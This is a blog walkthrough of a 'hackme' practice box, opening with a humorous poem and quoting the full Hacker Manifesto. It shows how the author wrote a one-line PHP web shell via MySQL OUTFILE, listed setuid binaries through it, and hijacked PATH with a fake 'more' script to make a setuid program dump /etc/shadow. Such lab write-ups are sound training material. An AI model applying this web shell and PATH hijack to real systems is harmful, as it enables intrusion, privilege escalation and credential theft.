Encapsulating

Hackme challenge

There was once a box with 3306 and 80,
I decided that the configuration might be shaky,
Although I could brute the MySQL users,
My user/password combos were all losers,
I looked upon port 80 in wonder,
This is a hackme, there must be a blunder,
Although Dirbuster and Nikto proved fruitless,
Manual dir grinding was not completely useless,
/~mysql/ contained a backup file,
This hack had suddenly become worthwhile,
As I browsed the archive for a way in,
I saw a password in .bash_history, and it read, l3tm31n..

Now that I had root MySQL (and, rather conveniently, read/write to the file system via LOAD_FILE and OUTFILE), I could start probing for public Apache directories which I could write to as www-data. I figured the /~mysql/ directory would be a good place to start, but where is it on the file system? This took me longer than it should have done (I started looking in /home/mysql/, /etc/apache2/apache2.conf (and then started guessing the user specific Apache configuration under /etc/apache2/conf.d)) without success. Although /home/mysql/ seemed likely (and there was even the test.html file which was also in the /~mysql/ web directory), this was not the directory I was looking for.

Let’s look at that backup archive again, in particular, .bash_history:

mkdir public_html
ls -al
cd ..
tar cvzf mysql/public_html/backup.tgz mysql
cd mysql/
ls -la
cd public_html/

Fascinating, let’s apply some logic here. If:

mkdir public_html

is the first command the mysql user runs when they log in, then /home/mysql/public_html/ is where that directory will be created (typically).. Hey presto! PHP file created with MySQL OUTFILE:

<?php system($_GET['a']); ?>

Let’s find setuid binaries:

~mysql/yay1.php?a=find / -perm -4000 -ls

 32731   68 -rwsr-xr-x   1 root     root        64112 Apr 29  2008 /bin/mount
 32734   28 -rwsr-xr-x   1 root     root        27108 Nov 14  2009 /bin/su
 32749   32 -rwsr-xr-x   1 root     root        30788 Jul 27  2010 /bin/ping
 32730   44 -rwsr-xr-x   1 root     root        44088 Apr 29  2008 /bin/umount
295746    8 -rwsr-x--x   1 root     root         6629 Oct 27  2010 /bin/readmanifesto
 32750   28 -rwsr-xr-x   1 root     root        26616 Jul 27  2010 /bin/ping6
254809   40 -rwsr-sr-x   1 daemon   daemon      39864 Oct 20  2008 /usr/bin/at
255403   32 -rwsr-xr-x   1 root     root        32184 Nov 14  2009 /usr/bin/chfn
255407   32 -rwsr-xr-x   1 root     root        31704 Nov 14  2009 /usr/bin/passwd
255406   44 -rwsr-xr-x   1 root     root        41528 Nov 14  2009 /usr/bin/gpasswd
255404   28 -rwsr-xr-x   1 root     root        27736 Nov 14  2009 /usr/bin/chsh
258604   76 -rwsr-sr-x   1 root     mail        72544 Apr 30  2006 /usr/bin/procmail
255720   24 -rwsr-xr-x   1 root     root        22788 Nov 14  2009 /usr/bin/newgrp
279418  196 -rwsr-xr-x   1 root     root       192912 Jan 14  2009 /usr/lib/openssh/ssh-keysign
253975   12 -rwsr-xr-x   1 root     root         9620 Oct 21  2010 /usr/lib/pt_chown
271867    8 -rwsr-xr-x   1 root     root         4552 Oct  3  2008 /usr/lib/eject/dmcrypt-get-device

Wtf is … /bin/readmanifesto? Sounds interesting, let’s look:

::::::::::::::
/etc/manifesto.txt
::::::::::::::
The Hacker Manifesto

Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...

Damn kids. They're all alike.

But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him?

I am a hacker, enter my world...

Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me...

Damn underachiever. They're all alike.

I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..."

Damn kid. Probably copied it. They're all alike.

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be here...

Damn kid. All he does is play games. They're all alike.

And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all...

Damn kid. Tying up the phone line again. They're all alike...

You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert. 

This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.

Something about h4x0r5, whatever. It looks like this will be our attack vector, let’s pull up the proc list:

root      3713  0.0  0.1   1612   284 ?        S    11:17   0:00  |       |   \_ readmanifesto
root      3714  0.0  0.2   1996   548 ?        S    11:17   0:00  |       |       \_ more /etc/manifesto.txt

Holy sardines Batman! Relative binary calls? For fuck sake..

Let’s create a new file called ‘more’ in the /tmp directory, just for fun.

echo -e "#!/bin/bash\ncat /etc/shadow" > /tmp/more

Now let’s cat /tmp/more:

"#!/bin/bash
cat /etc/shadow"

Hmmm, let’s break out sed:

sed -i s/"//g /tmp/more
cat /tmp/more
#!/bin/bash
cat /etc/shadow

Now we need to update the $PATH variable so that the /tmp directory is searched:

PATH=/tmp:$PATH; readmanifesto
root:$xxxxxxxxxxxxxxxxxxxxx:14908:0:99999:7:::
.....
administrator:$xxxxxxxxxxxxxxxxxxxxxxxxxxx/:14908:0:99999:7:::
.....
mysql:$xxxxxxxxxxxxxxxxxxxxxxxx/:14908:0:99999:7:::

Sexy.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s